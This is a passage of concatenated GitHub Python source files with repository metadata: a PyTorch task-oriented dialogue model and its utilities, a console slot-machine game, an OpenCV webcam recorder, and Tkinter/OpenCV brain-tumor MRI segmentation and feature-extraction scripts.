input_lengths, None, None, db_tensor,\n bs_tensor, mask_tensor, if_detach=self.args.if_detach)\n target_length = target_tensor.size(1)\n\n # for fixed encoding this is zero so it does not contribute\n batch_size, seq_len = input_tensor.size()\n\n # ENCODER\n encoder_outputs, encoder_hidden = self.encoder(input_tensor,\n input_lengths) # encoder_outputs: tensor(maxlen_input, batch, 150); encoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n\n # pp added: extract backward output of encoder\n if self.num_directions == 2:\n if isinstance(encoder_hidden, tuple):\n # pp added: forward or backward\n encoder_hidden = encoder_hidden[0][1].unsqueeze(0), encoder_hidden[1][1].unsqueeze(0)\n # encoder_hidden = encoder_hidden[0][0].unsqueeze(0), encoder_hidden[1][0].unsqueeze(0)\n else:\n encoder_hidden = encoder_hidden[1].unsqueeze(0)\n\n # POLICY\n decoder_hidden = self.policy(encoder_hidden, db_tensor, bs_tensor,\n self.num_directions) # decoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n # print('decoder_hidden', decoder_hidden.size())\n\n # GENERATOR\n # Teacher forcing: Feed the target as the next input\n _, target_len = target_tensor.size()\n\n decoder_input = torch.as_tensor([[SOS_token] for _ in range(batch_size)], dtype=torch.long,\n device=self.device) # tensor[batch, 1]\n proba_p = torch.zeros(batch_size, target_length, self.vocab_size,\n device=self.device) # tensor[Batch, maxlen_target, V]\n\n # pp added\n future_info = proba_r if self.args.future_info == 'proba' else hidd\n\n # generate target sequence step by step !!!\n for t in range(target_len):\n # pp added: moe chair\n # decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, mask_tensor, dec_hidd_with_future=future_info.transpose(0, 1)) # decoder_output; decoder_hidden\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, mask_tensor, dec_hidd_with_future=proba_r.transpose(0, 1)) # decoder_output; decoder_hidden\n\n decoder_input = target_tensor[:, t].view(-1, 1) # [B,1] Teacher forcing\n # use_teacher_forcing = True if random.random() < self.args.teacher_ratio else False\n # if use_teacher_forcing:\n # decoder_input = target_tensor[:, t].view(-1, 1) # [B,1] Teacher forcing\n # else:\n # # Without teacher forcing: use its own predictions as the next input\n # topv, topi = decoder_output.topk(1)\n # # decoder_input = topi.squeeze().detach() # detach from history as input\n # decoder_input = topi.detach() # detach from history as input\n\n proba_p[:, t, :] = decoder_output # decoder_output[Batch, TargetVocab]\n\n return proba_p, None, decoded_sent\n else:\n # print('pretrain')\n proba_r, hidd, decoded_sent = self.retro_forward(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor,\n if_detach=self.args.if_detach)\n return proba_r, None, decoded_sent\n\n def predict(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None):\n # pp added\n with torch.no_grad():\n # ENCODER\n encoder_outputs, encoder_hidden = self.encoder(input_tensor, input_lengths)\n\n # POLICY\n decoder_hidden = self.policy(encoder_hidden, db_tensor, bs_tensor, self.num_directions)\n\n # GENERATION\n decoded_words = self.decode(target_tensor, decoder_hidden, encoder_outputs, mask_tensor)\n\n return decoded_words, 0\n\n def decode(self, target_tensor, decoder_hidden, encoder_outputs, mask_tensor=None):\n decoder_hiddens = decoder_hidden\n\n if self.beam_search: # wenqiang style - sequicity\n decoded_sentences = []\n for idx in range(target_tensor.size(0)): # idx is the batch index\n\n if isinstance(decoder_hiddens, tuple): # LSTM case\n decoder_hidden = (\n decoder_hiddens[0][:, idx, :].unsqueeze(0), decoder_hiddens[1][:, idx, :].unsqueeze(0))\n else:\n decoder_hidden = decoder_hiddens[:, idx, :].unsqueeze(0)\n encoder_output = encoder_outputs[:, idx, :].unsqueeze(1)\n\n # Beam start\n self.topk = 1\n endnodes = [] # stored end nodes\n number_required = min((self.topk + 1), self.topk - len(endnodes))\n decoder_input = torch.as_tensor([[SOS_token]], dtype=torch.long, device=self.device)\n # decoder_input = torch.LongTensor([[SOS_token]], device=self.device)\n\n # starting node hidden vector, prevNode, wordid, logp, leng,\n node = BeamSearchNode(decoder_hidden, None, decoder_input, 0, 1)\n nodes = PriorityQueue() # start the queue\n nodes.put((-node.eval(None, None, None, None),\n next(unique),\n node))\n\n # start beam search\n qsize = 1\n while True:\n # give up when decoding takes too long\n if qsize > 2000: break\n\n # fetch the best node\n score, _, n = nodes.get() # pp added: _\n decoder_input = n.wordid\n decoder_hidden = n.h\n\n if n.wordid.item() == EOS_token and n.prevNode != None: # its not empty\n endnodes.append((score, n))\n # if reach maximum # of sentences required\n if len(endnodes) >= number_required:\n break\n else:\n continue\n\n # decode for one step using decoder\n # import pdb\n # pdb.set_trace()\n mask_tensor_idx = mask_tensor[:, idx, :].unsqueeze(1) if mask_tensor is not None else None\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_output,\n mask_tensor_idx)\n\n log_prob, indexes = torch.topk(decoder_output, self.args.beam_width)\n nextnodes = []\n\n for new_k in range(self.args.beam_width):\n decoded_t = indexes[0][new_k].view(1, -1)\n log_p = log_prob[0][new_k].item()\n\n node = BeamSearchNode(decoder_hidden, n, decoded_t, n.logp + log_p, n.leng + 1)\n score = -node.eval(None, None, None, None)\n nextnodes.append((score, node))\n\n # put them into queue\n for i in range(len(nextnodes)):\n score, nn = nextnodes[i]\n nodes.put((score,\n next(unique),\n nn))\n\n # increase qsize\n qsize += len(nextnodes)\n\n # choose nbest paths, back trace them\n if len(endnodes) == 0:\n endnodes = [(nodes.get()[0], nodes.get()[-1]) for n in range(self.topk)]\n\n utterances = []\n for score, n in sorted(endnodes, key=operator.itemgetter(0)):\n utterance = []\n utterance.append(n.wordid)\n # back trace\n while n.prevNode != None:\n n = n.prevNode\n utterance.append(n.wordid)\n\n utterance = utterance[::-1]\n utterances.append(utterance)\n\n decoded_words = utterances[0]\n decoded_sentence = [self.output_index2word(str(ind.item())) for ind in decoded_words]\n # print(decoded_sentence)\n decoded_sentences.append(' '.join(decoded_sentence[1:-1]))\n\n return decoded_sentences\n\n else: # GREEDY DECODING\n # decoded_sentences = []\n decoded_sentences = self.greedy_decode(decoder_hidden, encoder_outputs, target_tensor, mask_tensor)\n return decoded_sentences\n\n def greedy_decode(self, decoder_hidden, encoder_outputs, target_tensor, mask_tensor=None):\n decoded_sentences = []\n batch_size, seq_len = target_tensor.size()\n # pp added\n decoder_input = torch.as_tensor([[SOS_token] for _ in range(batch_size)], dtype=torch.long, device=self.device)\n # decoder_input = torch.LongTensor([[SOS_token] for _ in range(batch_size)], device=self.device)\n\n decoded_words = torch.zeros((batch_size, self.max_len), device=self.device)\n for t in range(self.max_len):\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, mask_tensor)\n\n topv, topi = decoder_output.data.topk(1) # get candidates\n topi = topi.view(-1)\n\n decoded_words[:, t] = topi\n decoder_input = topi.detach().view(-1, 1)\n\n for sentence in decoded_words:\n sent = []\n for ind in sentence:\n if self.output_index2word(str(int(ind.item()))) == self.output_index2word(str(EOS_token)):\n break\n sent.append(self.output_index2word(str(int(ind.item()))))\n decoded_sentences.append(' '.join(sent))\n\n return decoded_sentences\n\n def clipGradients(self):\n grad = torch.nn.utils.clip_grad_norm_(self.parameters(), self.args.clip)\n return grad\n\n def saveModel(self, iter):\n print('Saving parameters..')\n if not os.path.exists(self.model_dir):\n os.makedirs(self.model_dir)\n\n torch.save(self.encoder.state_dict(), self.model_dir + '/' + self.model_name + '-' + str(iter) + '.enc')\n torch.save(self.policy.state_dict(), self.model_dir + '/' + self.model_name + '-' + str(iter) + '.pol')\n torch.save(self.decoder.state_dict(), self.model_dir + '/' + self.model_name + '-' + str(iter) + '.dec')\n\n with open(self.model_dir + '/' + self.model_name + '.config', 'w') as f:\n json.dump(vars(self.args), f, ensure_ascii=False, indent=4)\n\n def loadModel(self, iter=0):\n print('Loading parameters of iter %s ' % iter)\n self.encoder.load_state_dict(torch.load(self.pre_model_dir + '/' + self.model_name + '-' + str(iter) + '.enc'))\n self.policy.load_state_dict(torch.load(self.pre_model_dir + '/' + self.model_name + '-' + str(iter) + '.pol'))\n self.decoder.load_state_dict(torch.load(self.pre_model_dir + '/' + self.model_name + '-' + str(iter) + '.dec'))\n\n def input_index2word(self, index):\n if index in self.input_lang_index2word:\n return self.input_lang_index2word[index]\n else:\n raise UserWarning('We are using UNK')\n\n def output_index2word(self, index):\n if index in self.output_lang_index2word:\n return self.output_lang_index2word[index]\n else:\n raise UserWarning('We are using UNK')\n\n def input_word2index(self, index):\n if index in self.input_lang_word2index:\n return self.input_lang_word2index[index]\n else:\n return 2\n\n def output_word2index(self, index):\n if index in self.output_lang_word2index:\n return self.output_lang_word2index[index]\n else:\n return 2\n\n # pp added:\n def input_intent2index(self, intent):\n if intent in self.intent2index:\n return self.intent2index[intent]\n else:\n return 0\n\n def input_index2intent(self, index):\n if index in self.index2intent:\n return self.index2intent[index]\n else:\n raise UserWarning('We are using UNK intent')\n\n def getCount(self):\n learnable_parameters = filter(lambda p: p.requires_grad, self.parameters())\n param_cnt = sum([reduce((lambda x, y: x * y), param.shape) for param in learnable_parameters])\n print('Model has', param_cnt, ' parameters.')\n\n def printGrad(self):\n learnable_parameters = filter(lambda p: p.requires_grad, self.parameters())\n for idx, param in enumerate(learnable_parameters):\n print(param.grad, param.shape)\n" }, { "alpha_fraction": 0.6205095648765564, "alphanum_fraction": 0.6328662633895874, "avg_line_length": 36.91787338256836, "blob_id": "dd173f07f68f8cfff843510e676ba170af129bfc", "content_id": "9055c7e9ac94f57ee03e42580fbdef8a7702f78c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7850, "license_type": "no_license", "max_line_length": 145, "num_lines": 207, "path": "/utils/util.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "'''\nUtility functions\n'''\n\nimport argparse\nimport pickle as pkl\nimport json\nimport sys\nimport math\nimport time\nimport numpy as np\nimport torch\nimport random\nimport os\nimport shutil\n\n# DEFINE special tokens\nSOS_token = 0\nEOS_token = 1\nUNK_token = 2\nPAD_token = 3\n# detected_device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndetected_device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndefault_device = torch.device(\"cpu\")\n\ndef padSequence(tensor, device=default_device):\n pad_token = PAD_token\n tensor_lengths = [len(sentence) for sentence in tensor]\n longest_sent = max(tensor_lengths)\n batch_size = len(tensor)\n padded_tensor = torch.ones((batch_size, longest_sent), dtype=torch.int64, device=device) * pad_token\n\n # copy over the actual sequences\n for i, x_len in enumerate(tensor_lengths):\n sequence = tensor[i]\n padded_tensor[i, 0:x_len] = sequence[:x_len]\n\n padded_tensor = torch.as_tensor(padded_tensor, dtype=torch.long, device=device)\n # padded_tensor = torch.LongTensor(padded_tensor)\n return padded_tensor, tensor_lengths\n\n\ndef loadDialogue(model, val_file, input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor=None, intent2index=None, device=default_device):\n # Iterate over dialogue\n for idx, (usr, sys, bs, db, acts) in enumerate(\n zip(val_file['usr'], val_file['sys'], val_file['bs'], val_file['db'], val_file['acts'])):\n tensor = [model.input_word2index(word) for word in usr.strip(' ').split(' ')] + [EOS_token] # models.input_word2index(word)\n input_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=device)) # .view(-1, 1))\n # input_tensor.append(torch.LongTensor(tensor)) # .view(-1, 1))\n\n tensor = [model.output_word2index(word) for word in sys.strip(' ').split(' ')] + [EOS_token]\n target_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=device)) # .view(-1, 1)\n # target_tensor.append(torch.LongTensor(tensor)) # .view(-1, 1)\n\n bs_tensor.append([float(belief) for belief in bs])\n db_tensor.append([float(pointer) for pointer in db])\n\n # pp added: mask_i=0 if i_th it contains i_th intent\n if intent2index:\n tensor = torch.ones(len(intent2index), 1)\n # change acts & find index\n intent_type = model.args.intent_type\n if intent_type == 'domain':\n inds = [model.input_intent2index(act.split('-')[0]) for act in acts]\n elif intent_type == 'sysact':\n inds = [model.input_intent2index(act.split('-')[1]) for act in acts]\n elif intent_type == 'domain_act':\n inds = [model.input_intent2index(act) for act in acts] # the index of the chosen intents\n tensor[:][inds] = 0\n mask_tensor.append(torch.as_tensor(tensor, dtype=torch.uint8, device=device))\n\n return input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor # mask_tensor is a list of [Intent, 1]\n\n\n#json loads strings as unicode; we currently still work with Python 2 strings, and need conversion\ndef unicode_to_utf8(d):\n return dict((key.encode(\"UTF-8\"), value) for (key,value) in d.items())\n\n\ndef load_dict(filename):\n try:\n with open(filename, 'rb') as f:\n return unicode_to_utf8(json.load(f))\n except:\n with open(filename, 'rb') as f:\n return pkl.load(f)\n\n\ndef load_config(basename):\n try:\n with open('%s.json' % basename, 'rb') as f:\n return json.load(f)\n except:\n try:\n with open('%s.pkl' % basename, 'rb') as f:\n return pkl.load(f)\n except:\n sys.stderr.write('Error: config file {0}.json is missing\\n'.format(basename))\n sys.exit(1)\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n return '%s ' % (asMinutes(s))\n\n\n# pp added -- Start\ndef get_env_info():\n import sys\n print('Python version={}'.format(sys.version))\n print('PyTorch version={}'.format(torch.__version__))\n\n flag = torch.cuda.is_available()\n print('torch.cuda.is_available()={}'.format(flag))\n if flag:\n from torch.backends import cudnn\n cudnn.enabled = True\n cudnn.benchmark = False # False efficiency decrease; but fix random;\n cudnn.deterministic = True # if True, the result would keep same; if False, efficiency would be high but results would change slightly\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = '1' # choose which device to use\n # torch.set_default_tensor_type(torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor) # be careful if use\n print('torch.cuda.current_device()={}'.format(torch.cuda.current_device()))\n print('torch.cuda.device_count()={}'.format(torch.cuda.device_count()))\n print('torch.cuda.get_device_name(0)={}'.format(torch.cuda.get_device_name(0)))\n print('torch.backends.cudnn.version()={}'.format(cudnn.version()))\n print('torch.version.cuda={}'.format(torch.version.cuda))\n print('Memory Usage:')\n print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')\n print('Cached: ', round(torch.cuda.memory_cached(0)/1024**3,1), 'GB')\n\n\ndef get_ms():\n return time.time() * 1000\n\ndef init_seed(seed=None):\n if seed is None:\n seed = int(get_ms() // 1000)\n np.random.seed(seed)\n torch.manual_seed(seed)\n random.seed(seed)\n\ndef loadDictionaries(mdir):\n # load data and dictionaries\n with open('{}/input_lang.index2word.json'.format(mdir)) as f:\n input_lang_index2word = json.load(f)\n with open('{}/input_lang.word2index.json'.format(mdir)) as f:\n input_lang_word2index = json.load(f)\n with open('{}/output_lang.index2word.json'.format(mdir)) as f:\n output_lang_index2word = json.load(f)\n with open('{}/output_lang.word2index.json'.format(mdir)) as f:\n output_lang_word2index = json.load(f)\n\n\n return input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index\n\n# pp added: give a intent_type, return a list of intent names\ndef loadIntentDictionaries(intent_type='domain', intent_file='../data/intents.json'):\n fin = open(intent_file, 'r')\n intents = json.load(fin) # index 0 is UNK-UNK\n intent_list = []\n if intent_type == 'domain':\n intent_list = [intents[0].split('-')[0]] + sorted(list(set([s.split('-')[0] for s in intents[1:]])))\n elif intent_type == 'sysact':\n intent_list = [intents[0].split('-')[1]] + sorted(list(set([s.split('-')[1] for s in intents[1:]])))\n elif intent_type == 'domain_act':\n intent_list = intents\n if intent_list:\n print('intent_list=', intent_list)\n intent2index = {intent:index for index, intent in enumerate(intent_list)} # the first intent should be 'UNK-UNK'\n index2intent = dict(zip(intent2index.values(), intent2index.keys()))\n return intent2index, index2intent\n else:\n return None, None\n\n# TODO: initialise paras of a models in the same way\ndef init_params(model):\n from torch.nn.init import xavier_uniform_\n for name, param in model.named_parameters():\n print(name, param.size())\n if param.data.dim() > 1:\n xavier_uniform_(param.data)\n\n# creat a new dir if it do not exist\ndef pp_mkdir(path):\n if os.path.exists(path):\n shutil.rmtree(path)\n os.makedirs(path)\n else:\n os.makedirs(path)\n\n# pp added -- End\n\n" } ]
10
ethonwilles/casino
https://github.com/ethonwilles/casino
c64133d266b3d7f6fee0eaa6109f60377e7b9bec
d33be8f266f49042b942a0b67702c35ef24b35c1
023205019facbf3fd67a615556dd7bf271cfa160
refs/heads/master
2020-07-30T09:07:42.156506
2019-09-26T16:06:20
2019-09-26T16:06:20
210,167,024
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5347885489463806, "alphanum_fraction": 0.5628921985626221, "avg_line_length": 44.82500076293945, "blob_id": "e851ca0955c549936b523146ad0d92bbcf10c963", "content_id": "05495612cdd47933e385b016813d20584d6b229f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3665, "license_type": "no_license", "max_line_length": 182, "num_lines": 80, "path": "/casino.py", "repo_name": "ethonwilles/casino", "src_encoding": "UTF-8", "text": "import random\nslots = [1,2,3,4,5,6,7]\n\n\ndef initial_welcome(money):\n try: \n if type(int(money)) == int and int(money) <= 50:\n print('Welcome to the Casino!')\n print(' We will begin to play slots!')\n print(\"\"\"\n Rules:\n * It costs $3.00 to play.\n * If your wallet hits zero, the game ends.\n * If your wallet does not have enough to continue the game, the game ends\n * Max Amount of Money that can be entered is $50\n \"\"\")\n \n game(money,input('Enter Yes to play, Enter No to quit.: '))\n elif int(money) >= 1000000:\n print('\\n Come on you definitely dont have more than $1,000,000.')\n initial_welcome(input('Try again. Remember, no more than $50: '))\n else:\n print('Too much money.')\n initial_welcome(input('Try again. Remember, no more than $50: '))\n\n except:\n try:\n if type(money) == str:\n print('Thanks for playing!')\n except:\n initial_welcome(input('Invalid Response. Needs to be an integer. Try Again: '))\n\ndef game(money,choice):\n if (choice.lower()) == 'yes':\n player_wallet = int(money)\n print(f'You are starting out with ${player_wallet}.00')\n player_wallet -= 3\n print(f'\\n The game cost $3.00 so now your wallet is down to ${player_wallet}.00')\n slot_nums = []\n for i in range(0,3):\n rannum = random.randint(1,len(slots))\n slot_nums.append(rannum)\n if player_wallet < 3 or player_wallet - 1 < 3:\n print(f'Sadly your wallet is at ${player_wallet}.00')\n initial_welcome(input(\"You don't have enough money to continue! How much more money would you like to add? Or enter no to stop playing.: \"))\n elif slot_nums[0] == 7 and slot_nums[1] == 7 and slot_nums[2] == 7:\n print('Three sevens!! Jackpot! 1000 dollars added to wallet.')\n player_wallet = player_wallet + 1000\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n elif slot_nums[0] == slot_nums[1] and slot_nums[1] == slot_nums[2] and slot_nums[2] == slot_nums[0]:\n print('Three of the same numbers rolled!! 5 dollars added to wallet.')\n player_wallet = player_wallet + 5\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n elif slot_nums[0] == slot_nums[1] - 1 and slot_nums[0] == slot_nums[2] - 2:\n print('You won!! 4 dollars added to wallet.')\n player_wallet = player_wallet + 4\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n elif slot_nums[0] == 7 or slot_nums[1] == 7 or slot_nums[2] == 7:\n print('One of your rolled numbers was 7!! You get $1.00!!')\n player_wallet += 1\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n \n \n else:\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet,input('No winnings :/ Play Again?? **Enter yes or no**: '))\n \n else:\n print('Thanks for Playing!')\n\n\n\n\n\n\ninitial_welcome(input('How much money would you like to add? WARNING** Only a max of $50 can be entered at a time. Thinking you have anything above $50 is just wishful thinking.: '))" } ]
1
MatheusCiSoares/opencv-python
https://github.com/MatheusCiSoares/opencv-python
804d641eb4793e13540394ca9b6fe80699e9747d
d7f80c10f071b6694086355fa2120fdcfa486758
5358e1b7bc93737d2c5d8d0da56cdc51a1e590ff
refs/heads/master
2020-12-19T20:42:49.876440
2020-01-23T17:16:59
2020-01-23T17:16:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6275132298469543, "alphanum_fraction": 0.6698412895202637, "avg_line_length": 26.794116973876953, "blob_id": "d90742a2531cf9da50bb122e8b4ed4fc4831e422", "content_id": "d3fc6ccaf6d42e4f2c219dbe5bbf63602da55651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 948, "license_type": "no_license", "max_line_length": 76, "num_lines": 34, "path": "/start-opencv-video.py", "repo_name": "MatheusCiSoares/opencv-python", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy\n\n#camera ou arquivo \".... .mp4\"\n#0-1-2, o 0 é a câmera default\n\n# print(camera.isOpened()) (MOSTRAR SE CONSEGUIU SE CONECTAR COM A CÂMERA!)\ncamera = cv2.VideoCapture(0)\ncamera.set(3,1280) #3=largura\ncamera.set(4,720) #4=altura\n#devemos definir o tamanho da camera, na sua resolucao, para podermos gravar\n#tamanhos diferentes da camera vai ocorrer erro na gravacao!\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('Videos/nomeArquivo.avi',fourcc,30,(1280,720))\n\nwhile(camera.isOpened()):\n ret,frame = camera.read()\n if ret == True:\n # print(camera.get(cv2.CAP_PROP_FRAME_WIDTH))\n # print(camera.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n out.write(frame)\n\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n cv2.imshow('frame',gray)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\ncamera.release()\nout.release()\ncv2.destroyAllWindows()\n" } ]
1
Ritz5940/brain_tumor_detection
https://github.com/Ritz5940/brain_tumor_detection
938ae0118c6af02930803a0ebb39bedc9bfef802
e96c4c079b90e721226f0a83cb4732ef750de10c
b2ac43a9cb0aa0609d221f053105a73ca50f8f14
refs/heads/master
2022-12-17T00:38:16.080928
2020-09-22T16:59:43
2020-09-22T16:59:43
297,706,643
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5187870860099792, "alphanum_fraction": 0.555372416973114, "avg_line_length": 41.342857360839844, "blob_id": "ca02e428cdf141eddf4b8024012d6fc566c335bf", "content_id": "d4aeb8a85e1675276b0a6058e2db9aefeb58665a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3034, "license_type": "no_license", "max_line_length": 91, "num_lines": 70, "path": "/traindata.py", "repo_name": "Ritz5940/brain_tumor_detection", "src_encoding": "UTF-8", "text": "import xlwt \r\nfrom xlwt import Workbook\r\nimport os\r\nimport pandas as pd\r\n\r\ndef Train_data():\r\n datadir = \"H:\\RITESH\\Python\\ML\\Phase3\\Brain Toumer\"\r\n Categories = [\"no\",\"yes\"]\r\n j=0\r\n wb = Workbook()\r\n sheet1 = wb.add_sheet('Sheet 1')\r\n for category in Categories:\r\n path = os.path.join(datadir,category)\r\n #print(len(os.listdir(path))\r\n for img in os.listdir(path): \r\n #name= filedialog.askopenfilename() \r\n img = cv2.imread(os.path.join(path,img))\r\n img1=img\r\n im_out=np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n mask = np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n height, width= img_gray.shape\r\n ret,im_th= cv2.threshold(img_gray,180,255,cv2.THRESH_BINARY)\r\n #cv2.imshow('image Throshold', im_th)\r\n denoised=cv2.medianBlur(im_th,9)\r\n #cv2.imshow('image Denoised', denoised)\r\n edges = cv2.Canny(denoised,100,200)\r\n #cv2.imshow('Edges',edges)\r\n # noise removal\r\n kernel = np.ones((3,3),np.uint8)\r\n opening = cv2.morphologyEx(denoised,cv2.MORPH_OPEN,kernel, iterations = 2)\r\n\r\n # sure background area\r\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\r\n\r\n # Finding sure foreground area\r\n dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\r\n ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\r\n\r\n # Finding unknown region\r\n sure_fg = np.uint8(sure_fg)\r\n unknown = cv2.subtract(sure_bg,sure_fg)\r\n # Marker labelling\r\n ret, markers = cv2.connectedComponents(sure_fg)\r\n\r\n # Add one to all labels so that sure background is not 0, but 1\r\n markers = markers+1\r\n\r\n # Now, mark the region of unknown with zero\r\n markers[unknown==255] = 0\r\n markers = cv2.watershed(img,markers)\r\n img[markers == 1] = [255,255,255]\r\n img1[markers == 1] = [0]\r\n im_th=cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\r\n #cv2.imshow('image marker',img)\r\n img1 = cv2.bitwise_and(img, img, mask=mask)\r\n g = skimage.feature.greycomatrix(im_th, [1], [0], levels=256, symmetric=False, \r\n normed=True)\r\n contrast = skimage.feature.greycoprops(g, 'contrast')[0][0]\r\n energy = skimage.feature.greycoprops(g, 'energy')[0][0]\r\n homogeneity = skimage.feature.greycoprops(g, 'homogeneity')[0][0]\r\n correlation = skimage.feature.greycoprops(g, 'correlation')[0][0]\r\n sheet1.write(j, 0, contrast) \r\n sheet1.write(j, 1, energy) \r\n sheet1.write(j, 2, homogeneity) \r\n sheet1.write(j, 3, correlation)\r\n print(j)\r\n j=j+1\r\n wb.save('xlwt example.xls')\r\n #print(pandas.read_excel('xlwt example.xls'))\r\n" }, { "alpha_fraction": 0.5783284902572632, "alphanum_fraction": 0.6277443170547485, "avg_line_length": 44.64930725097656, "blob_id": "b81462cc88a4e4ca81059d389766c2ef0ff2d250", "content_id": "23e35102f30ee8d596b81c1d3380f61c42f39c50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13437, "license_type": "no_license", "max_line_length": 171, "num_lines": 288, "path": "/train and extarction.py", "repo_name": "Ritz5940/brain_tumor_detection", "src_encoding": "UTF-8", "text": "from tkinter import *\r\nimport tkinter\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter.ttk import Progressbar \r\nimport cv2\r\nimport PIL.Image, PIL.ImageTk\r\nimport numpy as np;\r\nimport copy\r\nfrom skimage import data\r\nfrom skimage.feature import greycomatrix, greycoprops\r\nimport skimage.io\r\nimport skimage.feature\r\nimport xlwt \r\nfrom xlwt import Workbook\r\nimport os\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nimport time \r\n# Create a window\r\nwindow =Tk()\r\nwindow.title(\"BRAIN TUMOR DETECTION USING MACHINE LEARNING\")\r\nwindow.geometry(\"1366x768\")\r\nmessage = tk.Label(window, text=\"BRAIN TUMOR DETECTION USING MACHINE LEARNING\" ,bg=\"Green\" ,fg=\"white\" ,width=50 ,height=3,font=('times', 20, 'italic bold underline')) \r\n\r\nmessage.place(x=270, y=20)\r\ndef answer():\r\n global cv_img, mask,img,canvas1,canvas4,canvas2,canvas3\r\n canvas1.delete(\"all\")\r\n canvas2.delete(\"all\")\r\n canvas3.delete(\"all\")\r\n canvas4.delete(\"all\")\r\n #showerror(\"Answer\", \"Sorry, no answer available\")\r\n name= filedialog.askopenfilename() \r\n cv_img = cv2.imread(name)\r\n newsize = (180, 218) \r\n cv_img = cv2.resize(cv_img,newsize) \r\n img=cv_img\r\n \r\n mask = np.zeros(cv_img.shape[:2], dtype=\"uint8\") * 255\r\n # Get the image dimensions (OpenCV stores image data as NumPy ndarray)\r\n height, width, no_channels = cv_img.shape\r\n\r\n lbl = tk.Label(window, text=\"Original Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=70, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas1 = tkinter.Canvas(window, width = width, height = height)\r\n canvas1.place(x=50,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(cv_img))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas1.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n \r\n # Run the window loop\r\n window.mainloop()\r\ndef rgb2gray():\r\n global cv_img,img_gray,canvas1,canvas2\r\n img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)\r\n height, width= img_gray.shape\r\n #canvas1.delete(\"all\")\r\n lbl = tk.Label(window, text=\"Gray Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=270, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas2 = tkinter.Canvas(window, width = width, height = height)\r\n canvas2.place(x=250,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(img_gray))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas2.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n window.mainloop()\r\ndef Thresholding():\r\n global cv_img,img_gray,im_th,canvas2,canvas3\r\n #canvas2.delete(\"all\")\r\n for threshold in range(150,180):\r\n ret,im_th= cv2.threshold(img_gray,threshold,255,cv2.THRESH_BINARY)\r\n height, width= im_th.shape\r\n lbl = tk.Label(window, text=\"Threshold Image\",width=20 